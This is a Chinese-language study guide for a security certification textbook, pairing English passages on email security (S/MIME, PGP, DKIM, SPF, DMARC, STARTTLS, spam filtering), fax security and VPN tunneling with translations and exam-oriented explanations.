强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 29 / PDF P866

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

an email server by directly connecting to the email server's SMTP port. And speaking of in-transit modification, there are no native integrity checks to ensure that a message was not altered between its source and destination. In addition, email itself can be used as an attack mechanism. When sufficient numbers of messages are directed to a single user's inbox or through a specific SMTP server, a DoS attack can result. This attack is often called mailbombing and is simply a DoS performed by inundating a system with messages. The DoS can be the result of storage capacity consumption or processing capability utilization.

Either way, the result is the same: legitimate messages cannot be delivered. A similar DoS issue is called a mail storm. This is when someone responds with a Reply All to a message that has a significant number of other recipients in the To: and CC: lines. As others receive these replies, they, in turn, use Reply All with their comments or demands to be removed from the conversation. This is further exacerbated if recipients have auto-responders set to Reply All for out-of-office notifications or other announcements. Like email flooding and malicious code attachments, unwanted email can be considered an attack. Sending unwanted, inappropriate, or irrelevant messages is called spamming.

Spamming is often little more than a nuisance, but it does waste system resources both locally and over the Internet. It is often difficult to stop spam because the source of the messages is usually spoofed. Email Security Solutions Imposing security on email is possible, but the efforts should be in tune with the value and confidentiality of the messages being exchanged. You can use several protocols, services, and solutions to add security to email without requiring a complete overhaul of the entire Internet-based SMTP infrastructure.

Many of these email security improvements are forms of encryption; see Chapter 6, “Cryptography and Symmetric Key Algorithms,” and Chapter 7, “PKI and Cryptographic Applications,” for information on cryptography. Secure Multipurpose Internet Mail Extensions (S/MIME) S/MIME is an email security standard that offers authentication and confidentiality to email through public key encryption, digital envelopes, and digital signatures. Authentication is provided through X.509 digital certificates issued by trusted third-party CAs. Privacy is provided through the use of Public Key

中文直译 / 整理

电子邮件服务器。 至于传输过程中的修改,没有任何原生完整性检查来确保 消息在源和目的地之间未被篡改。 此外,电子邮件本身也可用作攻击手段。 当大量邮件被定向发送到单个用户的 收件箱或通过特定的SMTP服务器时,可能导致拒绝服务(DoS)攻击。 这种 攻击通常被称为邮件轰炸,本质上是通过大量邮件淹没系统来实施的DoS攻击。 DoS攻击可能是由于存储容量耗尽或处理能力被占用所致。 无论如何,结果都 是一样的:合法邮件无法送达。 一种类似的DoS问题被称为邮件风暴。 当某人对收件人列表中包含大量其他收 件人的邮件使用“全部回复”时,就会发生这种情况。 当其他人收到这些回复 后,他们又会使用“全部回复”来发表评论或要求从对话中移除自己。 如果收 件人设置了自动回复功能,用于处理外出通知或其他公告并自动“全部回复”, 这种情况会进一步加剧。 与邮件泛滥和恶意代码附件类似,垃圾邮件也可被视为一种攻击。 发送不需要、 不恰当或无关的邮件被称为垃圾邮件发送。 垃圾邮件发送通常仅仅是一种烦扰, 但它确实浪费了本地和互联网上的系统资源。 由于邮件来源通常被伪造,因此 阻止垃圾邮件往往非常困难。

电子邮件安全解决方案 对电子邮件实施安全保护是可能的,但所投入的努力应与所交换消息的价值和 机密性相匹配。 您可以使用多种协议、服务和解决方案,在无需彻底改造整个 基于互联网的SMTP基础设施的情况下,为电子邮件增加安全性。 许多这些电 子邮件安全改进都是加密形式; 有关加密的详细信息,请参见第6章,“加密 与对称密钥算法”和第7章,“PKI与加密应用”。 安全多用途互联网邮件扩展(S/MIME) S/MIME 是一种电子邮件安全标准, 通过公钥加密、数字信封和数字签名为电子邮件提供身份验证和机密性。 身份验 证通过受信任的第三方CA颁发的X.509数字证书实现。 隐私性通过使用公钥

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
学习单元 30 / PDF P867

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Cryptography Standard (PKCS) standards-compliant encryption. Two types of messages can be formed using S/MIME: signed messages and secured enveloped messages. A signed message provides integrity, sender authentication, and nonrepudiation. An enveloped message provides recipient authentication and confidentiality. Pretty Good Privacy (PGP) PGP is a peer-to-peer public-private key– based email system that uses a variety of encryption algorithms to encrypt files and email messages. PGP is not a standard but rather an independently developed product that has wide Internet grassroots support, which has elevated its proprietary certificates to de facto standard status.

DomainKeys Identified Mail (DKIM) DKIM is an email authentication method designed to verify the authenticity of the sender of an email message. It allows the recipient's mail server to check that an email claiming to come from a specific domain was indeed authorized by the owner of that domain. DKIM helps combat email spoofing, phishing, and other forms of email fraud by providing a way to verify the integrity of the email's origin. See http://dkim.org. Sender Policy Framework (SPF) To protect against spam and email spoofing, an organization can also configure its SMTP servers for Sender Policy Framework (SPF).

SPF operates by checking that inbound messages originate from a host authorized to send messages by the owners of the SMTP origin domain. For example, if you receive a message from mark.nugget@abccorps.com, then SPF checks with the administrators of smtp.abccorps.com that mark.nugget is authorized to send messages through their system before the inbound message is accepted and sent into your recipient's inbox. Domain-based Message Authentication Reporting and Conformance (DMARC) DMARC is a DNS-based email authentication system. It is an email authentication and policy framework that builds on the SPF (Sender Policy Framework) and DKIM (DomainKeys Identified Mail) protocols.

DMARC allows domain owners to specify how their emails should be authenticated, how failed authentication should be handled, and how feedback about email activity should be provided. DMARC is intended to protect against business email compromise (BEC), phishing, and other email scams. Email servers can verify if a received message is valid by following the DNS-based instructions; if invalid, the email can be discarded, quarantined, or delivered anyway.

中文直译 / 整理

加密标准(PKCS)兼容的加密技术实现。 使用S/MIME可以形成两种类型的消 息:已签名消息和加密信封消息。 已签名消息提供完整性、发送方身份验证和 不可否认性性。 加密信封消息提供接收方身份验证和机密性。 Pretty Good Privacy (PGP) PGP 是一种点对点的公钥‑私钥电子邮件系统, 使用多种加密算法来加密文件和电子邮件消息。 PGP 不是一个标准,而是一个 独立开发的产品,拥有广泛的互联网民间支持,使其专有证书上升为事实上的 标准。 DomainKeys Identified Mail (DKIM) DKIM 是一种电子邮件身份验证方法, 旨在验证电子邮件发件人的真实性。 它允许收件人的邮件服务器检查声称来自特 定域的电子邮件是否确实由该域的所有者授权。 DKIM 通过提供验证电子邮件来 源完整性的方法,帮助打击电子邮件伪造、钓鱼和其他形式的电子邮件欺诈。 请 参阅http://dkim.org。 Sender Policy Framework (SPF) 为了防止垃圾邮件和电子邮件伪造,组织 还可以为其 SMTP 服务器配置发件人策略框架(SPF)。

SPF 通过检查传入消息 是否来自 SMTP 源域所有者授权发送消息的主机来运行。 例如,如果您收到一封 来自 mark.nugget@abccorps.com,然后SPF检查会与smtp.abccorps.com的管理员确 认mark.nugget是否被授权通过其系统发送邮件,之后才会接受传入邮件并将 其发送到收件人的收件箱。 基于域的消息认证报告和 合规性(DMARC) DMARC 是一种基于 DNS 的电子邮件身份验证系统。 它 是一种构建在 SPF(发件人策略框架)和 DKIM(域密钥识别邮件)协议之上 的电子邮件身份验证和策略框架。 DMARC 允许域名所有者指定其电子邮件应 如何进行身份验证、身份验证失败时应如何处理,以及如何提供有关电子邮件 活动的反馈。 DMARC 旨在防止商业电子邮件泄露(BEC)、网络钓鱼和其他 电子邮件欺诈行为。 电子邮件服务器可以通过遵循基于 DNS 的指令来验证收 到的消息是否有效; 如果无效,邮件可以被丢弃、隔离或仍被投递。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

真实性:真实性确认数据、身份或来源是真的,不是假冒的。

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

证书、签名、强认证常支持真实性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

密码、令牌、生物特征、多因素认证都服务认证。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
真实性 真实性确认数据、身份或来源是真的,不是假冒的。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
学习单元 31 / PDF P868

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

STARTTLS A lot of organizations are using Secure SMTP over TLS nowadays; however, it's not as widespread as it should be. STARTTLS (aka explicit TLS or opportunistic TLS for SMTP) will attempt to set up an encrypted connection with the target email server in the event that it is supported. STARTTLS is not a protocol but instead an SMTP command. Once the initial SMTP connection is made to the email server, the STARTTLS command will be used. If the target system supports TLS, then an encrypted channel will be negotiated. Otherwise, it will remain as plaintext. STARTTLS's secure session will take place on TCP port 587.

STARTTLS can also be used with IMAP connections, whereas POP3 connections use the STLS command to perform a similar function. Implicit SMTPS This is the TLS-encrypted form of SMTP, which assumes the target server supports TLS. If accurate, then an encrypted session is negotiated. If not, then the connection is terminated because plaintext is not accepted. SMTPS communications are initiated against TCP port 465. Free PGP Solution PGP started off as a free product for all to use, but it has since splintered into various divergent products.

PGP is a commercial product, whereas OpenPGP is a developing standard that GnuPG is compliant with and that was independently developed by the Free Software Foundation. If you have not used PGP before, we recommend downloading the appropriate GnuPG version for your preferred email platform. This secure solution is sure to improve your email privacy and integrity. You can learn more about GnuPG at http://gnupg.org. You can learn more about PGP by visiting its pages on Wikipedia. By using these and other security mechanisms for email and communication transmissions, you can reduce or eliminate many of the security vulnerabilities of email. Digital signatures can help eliminate impersonation.

The encryption of messages reduces eavesdropping. And the use of email filters keeps spamming and mail-bombing to a minimum. Blocking attachments at the email gateway system on your network can ease the threats from malicious attachments. You can have a 100 percent noattachments policy or block only attachments that are known or suspected to be malicious, such as attachments with extensions that are used for executable and scripting files. If attachments are an essential part of your STARTTLS

中文直译 / 整理

如今,许多组织都在使用基于 TLS 的安全 SMTP; 然而,其普及 程度仍不及应有的水平。 STARTTLS(又称 显式TLS 或 临时TLS 用于 S MTP)会在目标邮件服务器支持的情况下,尝试建立加密连接。 STARTTLS 不 是一种协议,而是一个 SMTP 命令。 在与邮件服务器建立初始 SMTP 连接后, 将使用 STARTTLS 命令。 如果目标系统支持 TLS,则会协商建立加密通道; 否 则,连接将保持明文状态。 STARTTLS 的安全会话将在 TCP 端口 587 上进行。 STARTTLS 也可用于 IMAP 连接,而 POP3 连接则使用 STLS 命令实现类似功 能。 隐式SMTPS 这是SMTP的TLS加密形式,假定目标服务器支持TLS。 如果正确, 则会协商加密会话; 如果不支持,则连接将被终止,因为不接受明文。 S MTPS通信通过TCP端口465发起。 免费的PGP解决方案 PGP最初是作为供所有人免费使用的软件,但此后已分裂为多种不同的产 品。 PGP是一种商业产品,而OpenPGP是一个由自由软件基金会独立开发 的、GnuPG遵循的开发中标准。

如果您之前未使用过PGP,我们建议您为 所使用的电子邮件平台下载相应的GnuPG版本。 这种安全解决方案必将提 升您的电子邮件隐私性和完整性。 您可以在 http://gnupg.org 了解更多关 于GnuPG的信息。 您可以通过访问Wikipedia上的PGP页面了解更多信息。 通过使用这些以及其他电子邮件和通信传输的安全机制,您可以减少或消除许 多电子邮件的安全漏洞。 数字签名有助于消除冒充行为。 消息加密可减少窃听。 而使用电子邮件过滤器可将垃圾邮件和邮件炸弹控制在最低限度。 在您网络的电子邮件网关系统上阻止附件可以减轻恶意附件的威胁。 您可以实 施100%无附件策略,或仅阻止已知或疑似恶意的附件,例如扩展名为可执行 文件和脚本文件的附件。 如果附件是您

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
学习单元 32 / PDF P869

第 869 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

email communications, you'll need to train your users and use antimalware tools for protection. Training users to avoid contact with suspicious or unexpected attachments greatly reduces the risk of malicious code transference via email. Antimalware products are generally effective against known malicious code, but they offer little protection against new or unknown varieties. Unwanted emails can be a hassle, a security risk, and a drain on resources. Whether spam, malicious email, or just bulk advertising, there are several ways to reduce the impact on your infrastructure. Block list services offer a subscription system to a list of known email abuse sources.

You can integrate the block list into your email server so that any messages originating from a known abusive domain or IP address are automatically discarded. Another option is to use a challenge/response filter. In these services, when an email is received from a new/unknown origin address, an autoresponder sends a request for a confirmation message. Spammers and auto-emailers will not respond to these requests, but valid humans will. Once they have confirmed that they are human and agree not to spam the destination address, their source address is added to an allow list for future communications. Unwanted email can also be managed through the use of email reputation filtering.

Several services maintain a grading system of email services in order to determine which are used for standard/normal communications and which are used for spam. These services include Sender Score, Cisco SenderBase Reputation Service, Broadcom's Symantec Email Security.cloud, Spamhaus ZEN, and Barracuda Reputation Block List (BRBL). These and other mechanisms are used as part of several spam filtering technologies, such as Apache SpamAssassin and spamd.

中文直译 / 整理

电子邮件通信的重要组成部分,您需要对用户进行培训并使用反恶意软件工 具进行保护。 通过培训用户避免接触可疑或意外的附件,可以大大降低通过 电子邮件传播恶意代码的风险。 反恶意软件产品通常对已知的恶意代码有效, 但对新型或未知的变种提供的保护有限。 不必要的电子邮件可能带来麻烦、安全风险,并消耗资源。 无论是垃圾邮件、 恶意邮件,还是批量广告,都有多种方法可以降低其对您基础设施的影响。 封 锁列表服务提供一种订阅系统,用于获取已知的电子邮件滥用来源列表。 您可 以将封锁列表集成到您的邮件服务器中,以便自动丢弃任何来自已知滥用域名 或IP地址的消息。 另一种选择是使用挑战/响应过滤器。 在这些服务中,当收到 来自新/未知发件地址的邮件时,自动回复器会发送一条确认消息请求。 垃圾邮 件发送者和自动邮件程序不会响应这些请求,但真实用户会。 一旦他们确认自 己是人类,并同意不向目标地址发送垃圾邮件,其发件地址就会被添加到允许 列表中,以便未来通信。 通过使用电子邮件信誉过滤,也可以管理不需要的电子邮件。 若干服务维护 着电子邮件服务的评分系统,以确定哪些用于标准/正常通信,哪些用于垃圾邮 件。

这些服务包括Sender Score、Cisco SenderBase信誉服务、Broadcom的 Symantec Email Security.cloud、Spamhaus ZEN和Barracuda信誉拦截列 表(BRBL)。 这些及其他机制被用作多种垃圾邮件过滤技术的一部分,例如 Apache SpamAssassin和spamd。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 869 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 33 / PDF P870

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Fax Security Fax communications are waning in popularity because of the widespread use of email. Even with declining use, faxes still represent a communications path that is vulnerable to attack. Like any other telephone communication, faxes can be intercepted and are susceptible to eavesdropping. Some of the mechanisms that can be deployed to improve the security of faxes are fax encrypters, link encryption, activity logs, and exception reports. A fax encrypter gives a fax machine the capability to use an encryption protocol to scramble the outgoing fax signal. Link encryption is the use of an encrypted communication path, like a VPN link or a secured telephone link, to transmit the fax.

Activity logs and exception reports can be used to detect anomalies in fax activity that could be symptoms of an attack. In addition to the security of a fax transmission, it is important to consider the security of a received fax. Faxes that are automatically printed may sit in the out tray for a long period of time, therefore making them subject to viewing by unintended recipients. Studies have shown that adding banners of CONFIDENTIAL, PRIVATE, and so on spur the curiosity of passersby. So, disable automatic printing. Also, avoid fax machines that retain a copy of the fax in memory or on a local storage device.

Consider integrating your fax system with your network so that you can email faxes to intended recipients instead of printing them to paper. Virtual Private Network A virtual private network (VPN) is a communication channel between two entities across an intermediary untrusted network. VPNs can provide several critical security functions, such as access control, authentication, confidentiality, and integrity. Most VPNs use encryption to protect the encapsulated traffic, but encryption is not necessary for the connection to be considered a VPN. A VPN is an example of a virtualized network.

VPNs are most commonly associated with establishing secure communication paths through the Internet between two distant networks.

中文直译 / 整理

传真安全 由于电子邮件的广泛使用,传真通信的流行度正在下降。 即使使用量减少, 传真仍然是一个易受攻击的通信途径。 与其他任何电话通信一样,传真可 以被截获,并容易受到窃听。 可用于提升传真安全性的机制包括传真加密器、链路加密、活动日志和异 常报告。 传真加密器可使传真机具备使用加密协议对发出的传真信号进行 混淆的能力。 链路加密是指使用加密通信通道(如VPN链路或安全电话链 路)传输传真。 活动日志和异常报告可用于检测传真活动中的异常,这些 异常可能是攻击的征兆。 除了传真传输的安全性外,还需考虑接收到的传真本身的安全性。 自动打 印的传真可能长时间停留在出纸托盘中,因此容易被非预期的接收者查看。 研究表明,添加“机密”、“私密”等标语会引发路过者的兴趣。 因此, 请禁用自动打印功能。 同时,避免使用在内存或本地存储设备中保留传真 副本的传真机。 建议将传真系统与网络集成,以便通过电子邮件将传真发 送给指定收件人,而非打印在纸上。 虚拟专用网络 一个 虚拟专用网络(VPN) 是两个实体通过一个中间不可信网络建立的通信 通道。 VPN 可以提供多种关键的安全功能,例如访问控制、身份验证、机密 性和完整性。

大多数 VPN 使用加密来保护封装的流量,但加密并非使连接被 视为 VPN 的必要条件。 VPN 是虚拟化网络的一个示例。 VPN 最常用于在两个远程网络之间通过互联网建立安全的通信路径。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
身份 身份是主体在系统中的标识。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 34 / PDF P871

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

However, they can exist anywhere, including within private networks or between end-user systems connected to an ISP. The VPN can link two networks or two individual systems. They can link clients, servers, routers, firewalls, and switches. VPNs are also helpful in providing security for legacy applications that rely on risky or vulnerable communication protocols or methodologies, especially when communication is across a network. Although VPNs can provide confidentiality and integrity over insecure or untrusted intermediary networks, they do not provide or guarantee availability.

VPNs are also in relatively widespread use to get around location requirements for services like Netflix and Hulu and thus provide a (at times questionable) level of anonymity. A VPN concentrator is a dedicated hardware device designed to support a large number of simultaneous VPN connections, often hundreds or thousands. It provides high availability, high scalability, and high performance for secure VPN connections. A VPN concentrator can also be called a VPN server, a VPN gateway, a VPN firewall, a VPN remote access server (RAS), a VPN device, a VPN proxy, or a VPN appliance. The use of VPN devices is transparent to networked systems.

Therefore, individual hosts do not need to support VPN capabilities locally if a VPN appliance is present. Tunneling Before you can truly understand VPNs, you must first grasp the concept of tunneling. Tunneling is the network communications process that protects the contents of protocol packets by encapsulating them in packets of another protocol. The encapsulation is what creates the logical illusion of a communications tunnel over the untrusted intermediary network. This virtual path exists between the encapsulation and the deencapsulation entities located at the ends of the communication.

As data is transmitted from one system to another across a VPN link, the normal LAN TCP/IP traffic is encapsulated (encased or enclosed) in the VPN protocol. The VPN protocol acts like a security envelope that provides special delivery capabilities (for example, across the Internet) as well as security mechanisms (such as data encryption). In fact, sending a snail mail letter to your grandmother involves the use of a tunneling system. You create the personal letter (the primary content protocol packet) and place it in an envelope (the tunneling protocol). The envelope is delivered through the postal service (the untrusted intermediary

中文直译 / 整理

然而,它们可以存在于任何地方,包括私有网络内部或连接到 ISP 的终端用户 系统之间。 VPN 可以连接两个网络或两个独立的系统。 它们可以连接客户端、 服务器、路由器、防火墙和交换机。 VPN 还有助于为依赖高风险或易受攻击 的通信协议或方法的遗留应用程序提供安全性,尤其是在跨网络通信时。 尽管VPN可以在不安全或不可信的中间网络上提供机密性和完整性,但它们无 法提供或保证可用性。 VPN还被广泛用于绕过Netflix和Hulu等服务的位置限 制,从而提供(有时存疑的)匿名性级别。 一个VPN集中器是一种专用硬件设备,旨在支持大量并发VPN连接,通常可达 数百甚至数千个。 它为安全的VPN连接提供高可用性、高可扩展性和高性能。 VPN集中器也可称为VPN服务器、VPN网关、VPN防火墙、VPN远程访问服务 器(RAS)、VPN设备、VPN代理或VPN专用设备。 VPN设备的使用对网络系 统是透明的。 因此,如果存在VPN专用设备,单个主机无需本地支持VPN功能。 隧道技术 在真正理解VPN之前,您必须首先掌握隧道技术的概念。 隧道技术是一种网络 通信过程,通过将协议数据包封装在另一种协议的数据包中来保护其内容。

这 种封装在不可信的中间网络上创建了逻辑上的通信隧道幻觉。 这条虚拟路径存 在于通信两端的封装与解封装实体之间。 当数据通过VPN链路从一个系统传输到另一个系统时,正常的局域网TCP/IP 流量会被封装(包裹或封闭)在VPN协议中。 VPN协议就像一个安全信封, 提供特殊的传输能力(例如通过互联网)以及安全机制(如数据加密)。 事实上,给祖母寄一封平信涉及使用隧道系统。 您创建个人信件(主内容协议 数据包),并将其放入信封中(隧道协议)。 信封通过邮政服务(不可信的中 介)送达预期收件人

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
